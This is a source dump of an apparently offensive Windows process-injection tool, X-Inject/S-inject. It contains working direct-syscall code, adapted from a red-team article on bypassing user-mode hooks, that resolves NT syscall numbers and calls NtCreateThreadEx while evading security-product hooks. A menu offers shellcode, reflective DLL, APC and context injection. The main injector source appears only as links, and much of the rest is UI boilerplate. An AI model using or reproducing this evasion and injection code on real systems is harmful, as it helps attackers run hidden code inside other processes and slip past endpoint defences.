125 |     <Image Include="..\ICON.ico">
126 |       <Filter>资源文件</Filter>
127 |     </Image>
128 |   </ItemGroup>
129 | </Project>


--------------------------------------------------------------------------------
/X-Inject/X-Inject.vcxproj.user:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <PropertyGroup>
 4 |     <ShowAllFiles>true</ShowAllFiles>
 5 |   </PropertyGroup>
 6 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 7 |     <LocalDebuggerCommandArguments>
 8 |     </LocalDebuggerCommandArguments>
 9 |     <DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
10 |   </PropertyGroup>
11 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
12 |     <LocalDebuggerCommandArguments>
13 |     </LocalDebuggerCommandArguments>
14 |     <DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
15 |   </PropertyGroup>
16 | </Project>


--------------------------------------------------------------------------------
/X-Inject/app/Injector.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Joe1sn/S-inject/0bb92bd0cc9eeafc4bea4fe15ddd5f9143838c90/X-Inject/app/Injector.cpp


--------------------------------------------------------------------------------
/X-Inject/app/Injector.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Joe1sn/S-inject/0bb92bd0cc9eeafc4bea4fe15ddd5f9143838c90/X-Inject/app/Injector.h


--------------------------------------------------------------------------------
/X-Inject/app/S-Wisper-asm.x64.asm:
--------------------------------------------------------------------------------
 1 | .code
 2 | 
 3 | EXTERN SW3_GetSyscallNumber: PROC
 4 | 
 5 | Sw3NtCreateThreadEx PROC
 6 | 	mov [rsp +8], rcx          ; Save registers.
 7 | 	mov [rsp+16], rdx
 8 | 	mov [rsp+24], r8
 9 | 	mov [rsp+32], r9
10 | 	sub rsp, 28h
11 | 	mov ecx, 084A94AFEh        ; Load function hash into ECX.
12 | 	call SW3_GetSyscallNumber              ; Resolve function hash into syscall number.
13 | 	add rsp, 28h
14 | 	mov rcx, [rsp+8]                      ; Restore registers.
15 | 	mov rdx, [rsp+16]
16 | 	mov r8, [rsp+24]
17 | 	mov r9, [rsp+32]
18 | 	mov r10, rcx
19 | 	syscall                    ; Invoke system call.
20 | 	ret
21 | Sw3NtCreateThreadEx ENDP
22 | 
23 | end


--------------------------------------------------------------------------------
/X-Inject/app/S-Wisper.c:
--------------------------------------------------------------------------------
  1 | #include "S-Wisper.h"
  2 | #include <stdio.h>
  3 | 
  4 | //#define DEBUG
  5 | 
  6 | // JUMPER
  7 | 
  8 | #ifdef _M_IX86
  9 | 
 10 | EXTERN_C PVOID internal_cleancall_wow64_gate(VOID) {
 11 |     return (PVOID)__readfsdword(0xC0);
 12 | }
 13 | 
 14 | __declspec(naked) BOOL local_is_wow64(void)
 15 | {
 16 |     __asm {
 17 |         mov eax, fs:[0xc0]
 18 |         test eax, eax
 19 |         jne wow64
 20 |         mov eax, 0
 21 |         ret
 22 |         wow64:
 23 |         mov eax, 1
 24 |         ret
 25 |     }
 26 | }
 27 | 
 28 | 
 29 | #endif
 30 | 
 31 | // Code below is adapted from @modexpblog. Read linked article for more details.
 32 | // https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams
 33 | 
 34 | SW3_SYSCALL_LIST SW3_SyscallList;
 35 | 
 36 | // SEARCH_AND_REPLACE
 37 | #ifdef SEARCH_AND_REPLACE
 38 | // THIS IS NOT DEFINED HERE; don't know if I'll add it in a future release
 39 | EXTERN void SearchAndReplace(unsigned char[], unsigned char[]);
 40 | #endif
 41 | 
 42 | DWORD SW3_HashSyscall(PCSTR FunctionName)
 43 | {
 44 |     DWORD i = 0;
 45 |     DWORD Hash = SW3_SEED;
 46 | 
 47 |     while (FunctionName[i])
 48 |     {
 49 |         WORD PartialName = *(WORD*)((ULONG_PTR)FunctionName + i++);
 50 |         Hash ^= PartialName + SW3_ROR8(Hash);
 51 |     }
 52 | 
 53 |     return Hash;
 54 | }
 55 | 
 56 | #ifndef JUMPER
 57 | PVOID SC_Address(PVOID NtApiAddress)
 58 | {
 59 |     return NULL;
 60 | }
 61 | #else
 62 | PVOID SC_Address(PVOID NtApiAddress)
 63 | {
 64 |     DWORD searchLimit = 512;
 65 |     PVOID SyscallAddress;
 66 | 
 67 |    #ifdef _WIN64
 68 |     // If the process is 64-bit on a 64-bit OS, we need to search for syscall
 69 |     BYTE syscall_code[] = { 0x0f, 0x05, 0xc3 };
 70 |     ULONG distance_to_syscall = 0x12;
 71 |    #else
 72 |     // If the process is 32-bit on a 32-bit OS, we need to search for sysenter
 73 |     BYTE syscall_code[] = { 0x0f, 0x34, 0xc3 };
 74 |     ULONG distance_to_syscall = 0x0f;
 75 |    #endif
 76 | 
 77 |   #ifdef _M_IX86
 78 |     // If the process is 32-bit on a 64-bit OS, we need to jump to WOW32Reserved
 79 |     if (local_is_wow64())
 80 |     {
 81 |     #ifdef DEBUG
 82 |         printf("[+] Running 32-bit app on x64 (WOW64)\n");
 83 |     #endif
 84 |         return NULL;
 85 |     }
 86 |   #endif
 87 | 
 88 |     // we don't really care if there is a 'jmp' between
 89 |     // NtApiAddress and the 'syscall; ret' instructions
 90 |     SyscallAddress = SW3_RVA2VA(PVOID, NtApiAddress, distance_to_syscall);
 91 | 
 92 |     if (!memcmp((PVOID)syscall_code, SyscallAddress, sizeof(syscall_code)))
 93 |     {
 94 |         // we can use the original code for this system call :)
 95 |         #if defined(DEBUG)
 96 |             printf("Found Syscall Opcodes at address 0x%p\n", SyscallAddress);
 97 |         #endif
 98 |         return SyscallAddress;
 99 |     }
100 | 
101 |     // the 'syscall; ret' intructions have not been found,
102 |     // we will try to use one near it, similarly to HalosGate
103 | 
104 |     for (ULONG32 num_jumps = 1; num_jumps < searchLimit; num_jumps++)
105 |     {
106 |         // let's try with an Nt* API below our syscall
107 |         SyscallAddress = SW3_RVA2VA(
108 |             PVOID,
109 |             NtApiAddress,
110 |             distance_to_syscall + num_jumps * 0x20);
111 |         if (!memcmp((PVOID)syscall_code, SyscallAddress, sizeof(syscall_code)))
112 |         {
113 |         #if defined(DEBUG)
114 |             printf("Found Syscall Opcodes at address 0x%p\n", SyscallAddress);
115 |         #endif
116 |             return SyscallAddress;
117 |         }
118 | 
119 |         // let's try with an Nt* API above our syscall
120 |         SyscallAddress = SW3_RVA2VA(
121 |             PVOID,
122 |             NtApiAddress,
123 |             distance_to_syscall - num_jumps * 0x20);
124 |         if (!memcmp((PVOID)syscall_code, SyscallAddress, sizeof(syscall_code)))
125 |         {
126 |         #if defined(DEBUG)
127 |             printf("Found Syscall Opcodes at address 0x%p\n", SyscallAddress);
128 |         #endif
129 |             return SyscallAddress;
130 |         }
131 |     }
132 | 
133 | #ifdef DEBUG
134 |     printf("Syscall Opcodes not found!\n");
135 | #endif
136 | 
137 |     return NULL;
138 | }
139 | #endif
140 | 
141 | 
142 | BOOL SW3_PopulateSyscallList()
143 | {
144 |     // Return early if the list is already populated.
145 |     if (SW3_SyscallList.Count) return TRUE;
146 | 
147 |     #ifdef _WIN64
148 |     PSW3_PEB Peb = (PSW3_PEB)__readgsqword(0x60);
149 |     #else
150 |     PSW3_PEB Peb = (PSW3_PEB)__readfsdword(0x30);
151 |     #endif
152 |     PSW3_PEB_LDR_DATA Ldr = Peb->Ldr;
153 |     PIMAGE_EXPORT_DIRECTORY ExportDirectory = NULL;
154 |     PVOID DllBase = NULL;
155 | 
156 |     // Get the DllBase address of NTDLL.dll. NTDLL is not guaranteed to be the second
157 |     // in the list, so it's safer to loop through the full list and find it.
158 |     PSW3_LDR_DATA_TABLE_ENTRY LdrEntry;
159 |     for (LdrEntry = (PSW3_LDR_DATA_TABLE_ENTRY)Ldr->Reserved2[1]; LdrEntry->DllBase != NULL; LdrEntry = (PSW3_LDR_DATA_TABLE_ENTRY)LdrEntry->Reserved1[0])
160 |     {
161 |         DllBase = LdrEntry->DllBase;
162 |         PIMAGE_DOS_HEADER DosHeader = (PIMAGE_DOS_HEADER)DllBase;
163 |         PIMAGE_NT_HEADERS NtHeaders = SW3_RVA2VA(PIMAGE_NT_HEADERS, DllBase, DosHeader->e_lfanew);
164 |         PIMAGE_DATA_DIRECTORY DataDirectory = (PIMAGE_DATA_DIRECTORY)NtHeaders->OptionalHeader.DataDirectory;
165 |         DWORD VirtualAddress = DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
166 |         if (VirtualAddress == 0) continue;
167 | 
168 |         ExportDirectory = (PIMAGE_EXPORT_DIRECTORY)SW3_RVA2VA(ULONG_PTR, DllBase, VirtualAddress);
169 | 
170 |         // If this is NTDLL.dll, exit loop.
171 |         PCHAR DllName = SW3_RVA2VA(PCHAR, DllBase, ExportDirectory->Name);
172 | 
173 |         if ((*(ULONG*)DllName | 0x20202020) != 0x6c64746e) continue;
174 |         if ((*(ULONG*)(DllName + 4) | 0x20202020) == 0x6c642e6c) break;
175 |     }
176 | 
177 |     if (!ExportDirectory) return FALSE;
178 | 
179 |     DWORD NumberOfNames = ExportDirectory->NumberOfNames;
180 |     PDWORD Functions = SW3_RVA2VA(PDWORD, DllBase, ExportDirectory->AddressOfFunctions);
181 |     PDWORD Names = SW3_RVA2VA(PDWORD, DllBase, ExportDirectory->AddressOfNames);
182 |     PWORD Ordinals = SW3_RVA2VA(PWORD, DllBase, ExportDirectory->AddressOfNameOrdinals);
183 | 
184 |     // Populate SW3_SyscallList with unsorted Zw* entries.
185 |     DWORD i = 0;
186 |     PSW3_SYSCALL_ENTRY Entries = SW3_SyscallList.Entries;
187 |     do
188 |     {
189 |         PCHAR FunctionName = SW3_RVA2VA(PCHAR, DllBase, Names[NumberOfNames - 1]);
190 | 
191 |         // Is this a system call?
192 |         if (*(USHORT*)FunctionName == 0x775a)
193 |         {
194 |             Entries[i].Hash = SW3_HashSyscall(FunctionName);
195 |             Entries[i].Address = Functions[Ordinals[NumberOfNames - 1]];
196 |             Entries[i].SyscallAddress = SC_Address(SW3_RVA2VA(PVOID, DllBase, Entries[i].Address));
197 | 
198 |             i++;
199 |             if (i == SW3_MAX_ENTRIES) break;
200 |         }
201 |     } while (--NumberOfNames);
202 | 
203 |     // Save total number of system calls found.
204 |     SW3_SyscallList.Count = i;
205 | 
206 |     // Sort the list by address in ascending order.
207 |     for (DWORD i = 0; i < SW3_SyscallList.Count - 1; i++)
208 |     {
209 |         for (DWORD j = 0; j < SW3_SyscallList.Count - i - 1; j++)
210 |         {
211 |             if (Entries[j].Address > Entries[j + 1].Address)
212 |             {
213 |                 // Swap entries.
214 |                 SW3_SYSCALL_ENTRY TempEntry;
215 | 
216 |                 TempEntry.Hash = Entries[j].Hash;
217 |                 TempEntry.Address = Entries[j].Address;
218 |                 TempEntry.SyscallAddress = Entries[j].SyscallAddress;
219 | 
220 |                 Entries[j].Hash = Entries[j + 1].Hash;
221 |                 Entries[j].Address = Entries[j + 1].Address;
222 |                 Entries[j].SyscallAddress = Entries[j + 1].SyscallAddress;
223 | 
224 |                 Entries[j + 1].Hash = TempEntry.Hash;
225 |                 Entries[j + 1].Address = TempEntry.Address;
226 |                 Entries[j + 1].SyscallAddress = TempEntry.SyscallAddress;
227 |             }
228 |         }
229 |     }
230 | 
231 |     return TRUE;
232 | }
233 | 
234 | EXTERN_C DWORD SW3_GetSyscallNumber(DWORD FunctionHash)
235 | {
236 |     // Ensure SW3_SyscallList is populated.
237 |     if (!SW3_PopulateSyscallList()) return -1;
238 | 
239 |     for (DWORD i = 0; i < SW3_SyscallList.Count; i++)
240 |     {
241 |         if (FunctionHash == SW3_SyscallList.Entries[i].Hash)
242 |         {
243 |             return i;
244 |         }
245 |     }
246 | 
247 |     return -1;
248 | }
249 | 
250 | EXTERN_C PVOID SW3_GetSyscallAddress(DWORD FunctionHash)
251 | {
252 |     // Ensure SW3_SyscallList is populated.
253 |     if (!SW3_PopulateSyscallList()) return NULL;
254 | 
255 |     for (DWORD i = 0; i < SW3_SyscallList.Count; i++)
256 |     {
257 |         if (FunctionHash == SW3_SyscallList.Entries[i].Hash)
258 |         {
259 |             return SW3_SyscallList.Entries[i].SyscallAddress;
260 |         }
261 |     }
262 | 
263 |     return NULL;
264 | }
265 | 
266 | EXTERN_C PVOID SW3_GetRandomSyscallAddress(DWORD FunctionHash)
267 | {
268 |     // Ensure SW3_SyscallList is populated.
269 |     if (!SW3_PopulateSyscallList()) return NULL;
270 | 
271 |     DWORD index = ((DWORD) rand()) % SW3_SyscallList.Count;
272 | 
273 |     while (FunctionHash == SW3_SyscallList.Entries[index].Hash){
274 |         // Spoofing the syscall return address
275 |         index = ((DWORD) rand()) % SW3_SyscallList.Count;
276 |     }
277 |     return SW3_SyscallList.Entries[index].SyscallAddress;
278 | }
279 | 


--------------------------------------------------------------------------------
/X-Inject/app/S-Wisper.h:
--------------------------------------------------------------------------------
  1 | #pragma once
  2 | // Code below is adapted from @modexpblog. Read linked article for more details.
  3 | // https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams
  4 | 
  5 | #ifndef SW3_HEADER_H_
  6 | #define SW3_HEADER_H_
  7 | 
  8 | #include <windows.h>
  9 | #include <winternl.h>
 10 | 
 11 | #ifndef _NTDEF_
 12 | typedef _Return_type_success_(return >= 0) LONG NTSTATUS;
 13 | typedef NTSTATUS* PNTSTATUS;
 14 | #endif
 15 | 
 16 | #define SW3_SEED 0xEB0CA24D
 17 | #define SW3_ROL8(v) (v << 8 | v >> 24)
 18 | #define SW3_ROR8(v) (v >> 8 | v << 24)
 19 | #define SW3_ROX8(v) ((SW3_SEED % 2) ? SW3_ROL8(v) : SW3_ROR8(v))
 20 | #define SW3_MAX_ENTRIES 600
 21 | #define SW3_RVA2VA(Type, DllBase, Rva) (Type)((ULONG_PTR) DllBase + Rva)
 22 | 
 23 | // Typedefs are prefixed to avoid pollution.
 24 | 
 25 | typedef struct _SW3_SYSCALL_ENTRY
 26 | {
 27 |     DWORD Hash;
 28 |     DWORD Address;
 29 | 	PVOID SyscallAddress;
 30 | } SW3_SYSCALL_ENTRY, *PSW3_SYSCALL_ENTRY;
 31 | 
 32 | typedef struct _SW3_SYSCALL_LIST
 33 | {
 34 |     DWORD Count;
 35 |     SW3_SYSCALL_ENTRY Entries[SW3_MAX_ENTRIES];
 36 | } SW3_SYSCALL_LIST, *PSW3_SYSCALL_LIST;
 37 | 
 38 | typedef struct _SW3_PEB_LDR_DATA {
 39 | 	BYTE Reserved1[8];
 40 | 	PVOID Reserved2[3];
 41 | 	LIST_ENTRY InMemoryOrderModuleList;
 42 | } SW3_PEB_LDR_DATA, *PSW3_PEB_LDR_DATA;
 43 | 
 44 | typedef struct _SW3_LDR_DATA_TABLE_ENTRY {
 45 | 	PVOID Reserved1[2];
 46 | 	LIST_ENTRY InMemoryOrderLinks;
 47 | 	PVOID Reserved2[2];
 48 | 	PVOID DllBase;
 49 | } SW3_LDR_DATA_TABLE_ENTRY, *PSW3_LDR_DATA_TABLE_ENTRY;
 50 | 
 51 | typedef struct _SW3_PEB {
 52 | 	BYTE Reserved1[2];
 53 | 	BYTE BeingDebugged;
 54 | 	BYTE Reserved2[1];
 55 | 	PVOID Reserved3[2];
 56 | 	PSW3_PEB_LDR_DATA Ldr;
 57 | } SW3_PEB, *PSW3_PEB;
 58 | 
 59 | DWORD SW3_HashSyscall(PCSTR FunctionName);
 60 | BOOL SW3_PopulateSyscallList();
 61 | EXTERN_C DWORD SW3_GetSyscallNumber(DWORD FunctionHash);
 62 | EXTERN_C PVOID SW3_GetSyscallAddress(DWORD FunctionHash);
 63 | EXTERN_C PVOID internal_cleancall_wow64_gate(VOID);
 64 | typedef struct _PS_ATTRIBUTE
 65 | {
 66 | 	ULONG  Attribute;
 67 | 	SIZE_T Size;
 68 | 	union
 69 | 	{
 70 | 		ULONG Value;
 71 | 		PVOID ValuePtr;
 72 | 	} u1;
 73 | 	PSIZE_T ReturnLength;
 74 | } PS_ATTRIBUTE, *PPS_ATTRIBUTE;
 75 | 
 76 | #ifndef InitializeObjectAttributes
 77 | #define InitializeObjectAttributes( p, n, a, r, s ) { \
 78 | 	(p)->Length = sizeof( OBJECT_ATTRIBUTES );        \
 79 | 	(p)->RootDirectory = r;                           \
 80 | 	(p)->Attributes = a;                              \
 81 | 	(p)->ObjectName = n;                              \
 82 | 	(p)->SecurityDescriptor = s;                      \
 83 | 	(p)->SecurityQualityOfService = NULL;             \
 84 | }
 85 | #endif
 86 | 
 87 | typedef struct _UNICODE_STRING_A
 88 | {
 89 | 	USHORT Length;
 90 | 	USHORT MaximumLength;
 91 | 	PWSTR  Buffer;
 92 | } UNICODE_STRINGA, *PUNICODE_STRINGA;
 93 | 
 94 | typedef struct _OBJECT_ATTRIBUTES_A
 95 | {
 96 | 	ULONG           Length;
 97 | 	HANDLE          RootDirectory;
 98 | 	UNICODE_STRINGA ObjectName;
 99 | 	ULONG           Attributes;
100 | 	PVOID           SecurityDescriptor;
101 | 	PVOID           SecurityQualityOfService;
102 | } OBJECT_ATTRIBUTESA, *POBJECT_ATTRIBUTESA;
103 | 
104 | typedef struct _PS_ATTRIBUTE_LIST
105 | {
106 | 	SIZE_T       TotalLength;
107 | 	PS_ATTRIBUTE Attributes[1];
108 | } PS_ATTRIBUTE_LIST, *PPS_ATTRIBUTE_LIST;
109 | 
110 | EXTERN_C NTSTATUS Sw3NtCreateThreadEx(
111 | 	OUT PHANDLE ThreadHandle,
112 | 	IN ACCESS_MASK DesiredAccess,
113 | 	IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
114 | 	IN HANDLE ProcessHandle,
115 | 	IN PVOID StartRoutine,
116 | 	IN PVOID Argument OPTIONAL,
117 | 	IN ULONG CreateFlags,
118 | 	IN SIZE_T ZeroBits,
119 | 	IN SIZE_T StackSize,
120 | 	IN SIZE_T MaximumStackSize,
121 | 	IN PPS_ATTRIBUTE_LIST AttributeList OPTIONAL);
122 | 
123 | #endif
124 | 


--------------------------------------------------------------------------------
/X-Inject/app/utils/crypto.hpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Joe1sn/S-inject/0bb92bd0cc9eeafc4bea4fe15ddd5f9143838c90/X-Inject/app/utils/crypto.hpp


--------------------------------------------------------------------------------
/X-Inject/app/utils/error.hpp:
--------------------------------------------------------------------------------
 1 | #pragma once
 2 | #include <iostream>
 3 | #include <Windows.h>
 4 | 
 5 | namespace Error {
 6 | 
 7 |     extern std::wstring GetLastErrorAsString() {
 8 | 
 9 |         DWORD errorMessageID = ::GetLastError();
10 |         if (errorMessageID == 0) {
11 |             return L"";
12 |         }
13 | 
14 |         LPWSTR messageBuffer = nullptr;
15 |         size_t size = FormatMessage(
16 |             FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_IGNORE_INSERTS,
17 |             NULL, errorMessageID, MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), (LPWSTR)&messageBuffer, 0, NULL);
18 | 
19 |         std::wstring message(messageBuffer, size);
20 |         LocalFree(messageBuffer);
21 | 
22 |         return message;
23 |     }
24 | 
25 |     void ErrorMsgBox(std::wstring hint) {
26 |         std::wstring errorMessage = GetLastErrorAsString();
27 |         if(errorMessage == L"")
28 |             MessageBox(NULL, hint.c_str(), L"Error", MB_OK | MB_ICONERROR);
29 |         else
30 |             MessageBox(NULL, (hint + L"\n" + errorMessage).c_str(), L"Error", MB_OK | MB_ICONERROR);
31 |     }
32 | 
33 |     void WarnMsgBox(std::wstring message) {
34 |         MessageBox(NULL, message.c_str(), L"Error", MB_OK | MB_ICONWARNING);
35 | 
36 |     }
37 | 
38 | 
39 | }
40 | 
41 | 


--------------------------------------------------------------------------------
/X-Inject/app/utils/helper.hpp:
--------------------------------------------------------------------------------
 1 | #pragma once
 2 | #include <iostream>
 3 | #include <windows.h>
 4 | #include <vector>
 5 | #include <sstream>
 6 | #include <iomanip>
 7 | 
 8 | using namespace std;
 9 | 
10 | 
11 | void set_color(unsigned short forecolor, unsigned short backcolor) {
12 |     HANDLE hConsole = GetStdHandle(STD_OUTPUT_HANDLE);
13 |     SetConsoleTextAttribute(hConsole, forecolor | backcolor);
14 | }
15 | 
16 | void set_normal() {
17 |     HANDLE hConsole = GetStdHandle(STD_OUTPUT_HANDLE);
18 |     SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE), FOREGROUND_INTENSITY | FOREGROUND_RED | FOREGROUND_GREEN | FOREGROUND_BLUE);
19 | }
20 | 
21 | 
22 | void banner() {
23 |     set_color(FOREGROUND_GREEN, FOREGROUND_INTENSITY);
24 |     cout << "\n   _____       _         _           __ " << endl;
25 |     cout << "  / ___/      (_)___    (_)__  _____/ /_" << endl;
26 |     cout << "  \\__ \\______/ / __ \\  / / _ \\/ ___/ __/" << endl;
27 |     cout << " ___/ /_____/ / / / / / /  __/ /__/ /_  " << endl;
28 |     cout << "/____/     /_/_/ /_/_/ /\\___/\\___/\\__/  " << endl;
29 |     cout << "                  /___/                 " << endl;
30 |     cout.flush();
31 |     set_normal();
32 | }
33 | 
34 | void menu() {
35 |     set_color(FOREGROUND_RED, FOREGROUND_INTENSITY);
36 | #ifdef _WIN64
37 |     cout << "-----------------------------Let SysWisper...    \n";
38 | #else
39 | #ifdef _WIN32
40 | 
41 | #endif // _WIN32
42 |     cout << "-----------------------------------------------\n";
43 | #endif // _WIN64
44 |     cout << "[1] Remote Thread Injection\n";
45 |     cout << "[2] Reflect DLL Injection\n";
46 |     cout << "[3] APC Dispatch Injection\n";
47 |     cout << "[4] Shellcode Injection\n";
48 |     cout << "[5] APC Shellcode Injection\n";
49 |     cout << "[6] Context Injection\n";
50 |     cout << "[7] List Injectable Process\n";
51 |     cout.flush();
52 |     set_normal();
53 | }


--------------------------------------------------------------------------------
/X-Inject/app/utils/query.hpp:
--------------------------------------------------------------------------------
  1 | #pragma once
  2 | #include <Windows.h>
  3 | #include <winternl.h>
  4 | // ���� NtQuerySystemInformation ����ָ������
  5 | typedef enum _KWAIT_REASON {
  6 |     Executive,
  7 |     FreePage,
  8 |     PageIn,
  9 |     PoolAllocation,
 10 |     DelayExecution,
 11 |     Suspended,
 12 |     UserRequest,
 13 |     WrExecutive,
 14 |     WrFreePage,
 15 |     WrPageIn,
 16 |     WrPoolAllocation,
 17 |     WrDelayExecution,
 18 |     WrSuspended,
 19 |     WrUserRequest,
 20 |     WrEventPair,
 21 |     WrQueue,
 22 |     WrLpcReceive,
 23 |     WrLpcReply,
 24 |     WrVirtualMemory,
 25 |     WrPageOut,
 26 |     WrRendezvous,
 27 |     WrKeyedEvent,
 28 |     WrTerminated,
 29 |     WrProcessInSwap,
 30 |     WrCpuRateControl,
 31 |     WrCalloutStack,
 32 |     WrKernel,
 33 |     WrResource,
 34 |     WrPushLock,
 35 |     WrMutex,
 36 |     WrQuantumEnd,
 37 |     WrDispatchInt,
 38 |     WrPreempted,
 39 |     WrYieldExecution,
 40 |     WrFastMutex,
 41 |     WrGuardedMutex,
 42 |     WrRundown,
 43 |     WrAlertByThreadId,
 44 |     WrDeferredPreempt,
 45 |     MaximumWaitReason
 46 | } KWAIT_REASON;
 47 | 
 48 | typedef NTSTATUS(WINAPI* fnNtQuerySystemInformation)(
 49 |     SYSTEM_INFORMATION_CLASS SystemInformationClass,
 50 |     PVOID SystemInformation,
 51 |     ULONG SystemInformationLength,
 52 |     PULONG ReturnLength);
 53 | 
 54 | // ���� SYSTEM_PROCESS_INFORMATION �ṹ
 55 | typedef struct _SYSTEM_THREADS {
 56 |     LARGE_INTEGER   KernelTime;
 57 |     LARGE_INTEGER   UserTime;
 58 |     LARGE_INTEGER   CreateTime;
 59 |     ULONG           WaitTime;
 60 |     PVOID           StartAddress;
 61 |     CLIENT_ID       ClientId;
 62 |     KPRIORITY       Priority;
 63 |     LONG            BasePriority;
 64 |     ULONG           ContextSwitchCount;
 65 |     ULONG           State;
 66 |     KWAIT_REASON    WaitReason;
 67 | } SYSTEM_THREADS, * PSYSTEM_THREADS;
 68 | 
 69 | typedef struct _SYSTEM_PROC_INFORMATION {
 70 |     ULONG           NextEntryOffset;
 71 |     ULONG           NumberOfThreads;
 72 |     LARGE_INTEGER   Reserved[3];
 73 |     LARGE_INTEGER   CreateTime;
 74 |     LARGE_INTEGER   UserTime;
 75 |     LARGE_INTEGER   KernelTime;
 76 |     UNICODE_STRING  ImageName;
 77 |     KPRIORITY       BasePriority;
 78 |     HANDLE          ProcessId;
 79 |     HANDLE          InheritedFromProcessId;
 80 |     ULONG           HandleCount;
 81 |     ULONG           SessionId;
 82 |     ULONG_PTR       UniqueProcessKey;
 83 |     SIZE_T          PeakVirtualSize;
 84 |     SIZE_T          VirtualSize;
 85 |     ULONG           PageFaultCount;
 86 |     SIZE_T          PeakWorkingSetSize;
 87 |     SIZE_T          WorkingSetSize;
 88 |     SIZE_T          QuotaPeakPagedPoolUsage;
 89 |     SIZE_T          QuotaPagedPoolUsage;
 90 |     SIZE_T          QuotaPeakNonPagedPoolUsage;
 91 |     SIZE_T          QuotaNonPagedPoolUsage;
 92 |     SIZE_T          PagefileUsage;
 93 |     SIZE_T          PeakPagefileUsage;
 94 |     SIZE_T          PrivatePageCount;
 95 |     LARGE_INTEGER   ReadOperationCount;
 96 |     LARGE_INTEGER   WriteOperationCount;
 97 |     LARGE_INTEGER   OtherOperationCount;
 98 |     LARGE_INTEGER   ReadTransferCount;
 99 |     LARGE_INTEGER   WriteTransferCount;
100 |     LARGE_INTEGER   OtherTransferCount;
101 |     SYSTEM_THREADS  Threads[1];
102 | } MySYSTEM_PROCESS_INFORMATION, * PMySYSTEM_PROCESS_INFORMATION;


--------------------------------------------------------------------------------
/X-Inject/app/utils/spectrum.h:
--------------------------------------------------------------------------------
  1 | #pragma once
  2 | #if !defined(SPECTRUM_USE_LIGHT_THEME) && !defined(SPECTRUM_USE_DARK_THEME)
  3 | #define SPECTRUM_USE_LIGHT_THEME
  4 | //#define SPECTRUM_USE_DARK_THEME
  5 | #endif
  6 | namespace Spectrum {
  7 |     // a list of changes introduced to change the look of the widgets. 
  8 |     // Collected here as const rather than being magic numbers spread 
  9 |     // around imgui.cpp and imgui_widgets.cpp.
 10 |     const float CHECKBOX_BORDER_SIZE = 2.0f;
 11 |     const float CHECKBOX_ROUNDING = 2.0f;
 12 | 
 13 |     // Load SourceSansProRegular and sets it as a default font.
 14 |     // You may want to call ImGui::GetIO().Fonts->Clear() before this
 15 |     // Sets the ImGui style to Spectrum
 16 | 
 17 |     namespace { // Unnamed namespace, since we only use this here. 
 18 |         unsigned int Color(unsigned int c) {
 19 |             // add alpha.
 20 |             // also swap red and blue channel for some reason.
 21 |             // todo: figure out why, and fix it.
 22 |             const short a = 0xFF;
 23 |             const short r = (c >> 16) & 0xFF;
 24 |             const short g = (c >> 8) & 0xFF;
 25 |             const short b = (c >> 0) & 0xFF;
 26 |             return(a << 24)
 27 |                 | (r << 0)
 28 |                 | (g << 8)
 29 |                 | (b << 16);
 30 |         }
 31 |     }
 32 |     // all colors are from http://spectrum.corp.adobe.com/color.html
 33 | 
 34 |     inline unsigned int color_alpha(unsigned int alpha, unsigned int c) {
 35 |         return ((alpha & 0xFF) << 24) | (c & 0x00FFFFFF);
 36 |     }
 37 | 
 38 |     namespace Static { // static colors
 39 |         const unsigned int NONE = 0x00000000; // transparent
 40 |         const unsigned int WHITE = Color(0xFFFFFF);
 41 |         const unsigned int BLACK = Color(0x000000);
 42 |         const unsigned int GRAY200 = Color(0xF4F4F4);
 43 |         const unsigned int GRAY300 = Color(0xEAEAEA);
 44 |         const unsigned int GRAY400 = Color(0xD3D3D3);
 45 |         const unsigned int GRAY500 = Color(0xBCBCBC);
 46 |         const unsigned int GRAY600 = Color(0x959595);
 47 |         const unsigned int GRAY700 = Color(0x767676);
 48 |         const unsigned int GRAY800 = Color(0x505050);
 49 |         const unsigned int GRAY900 = Color(0x323232);
 50 |         const unsigned int BLUE400 = Color(0x378EF0);
 51 |         const unsigned int BLUE500 = Color(0x2680EB);
 52 |         const unsigned int BLUE600 = Color(0x1473E6);
 53 |         const unsigned int BLUE700 = Color(0x0D66D0);
 54 |         const unsigned int RED400 = Color(0xEC5B62);
 55 |         const unsigned int RED500 = Color(0xE34850);
 56 |         const unsigned int RED600 = Color(0xD7373F);
 57 |         const unsigned int RED700 = Color(0xC9252D);
 58 |         const unsigned int ORANGE400 = Color(0xF29423);
 59 |         const unsigned int ORANGE500 = Color(0xE68619);
 60 |         const unsigned int ORANGE600 = Color(0xDA7B11);
 61 |         const unsigned int ORANGE700 = Color(0xCB6F10);
 62 |         const unsigned int GREEN400 = Color(0x33AB84);
 63 |         const unsigned int GREEN500 = Color(0x2D9D78);
 64 |         const unsigned int GREEN600 = Color(0x268E6C);
 65 |         const unsigned int GREEN700 = Color(0x12805C);
 66 |     }
 67 | 
 68 | #ifdef SPECTRUM_USE_LIGHT_THEME
 69 |     const unsigned int GRAY50 = Color(0xFFFFFF);
 70 |     const unsigned int GRAY75 = Color(0xFAFAFA);
 71 |     const unsigned int GRAY100 = Color(0xF5F5F5);
 72 |     const unsigned int GRAY200 = Color(0xEAEAEA);
 73 |     const unsigned int GRAY300 = Color(0xE1E1E1);
 74 |     const unsigned int GRAY400 = Color(0xCACACA);
 75 |     const unsigned int GRAY500 = Color(0xB3B3B3);
 76 |     const unsigned int GRAY600 = Color(0x8E8E8E);
 77 |     const unsigned int GRAY700 = Color(0x707070);
